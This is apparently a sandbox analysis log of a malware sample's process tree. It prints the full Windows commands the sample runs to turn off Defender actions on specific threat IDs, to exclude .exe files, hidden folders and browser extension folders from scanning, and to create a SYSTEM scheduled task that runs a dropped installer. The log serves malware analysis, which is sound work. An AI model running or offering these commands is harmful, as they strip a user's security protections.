C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 613⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 613⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 613⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 613⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force14⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 03:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF3B2.tmp\Install.exe\" 1g /RPqdidZnyf 385118 /S" /V1 /F10⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bqGGCwwWIommTRgeuN11⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bqGGCwwWIommTRgeuN12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 108010⤵
- Program crash
-
C:\Users\Admin\Pictures\9J1eQpa2VXXz30Zr9qHarAe1.exe"C:\Users\Admin\Pictures\9J1eQpa2VXXz30Zr9qHarAe1.exe"7⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\1000005001\7c602150df.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\7c602150df.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2364 -ip 23641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4936 -ip 49361⤵
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSF3B2.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSF3B2.tmp\Install.exe 1g /RPqdidZnyf 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 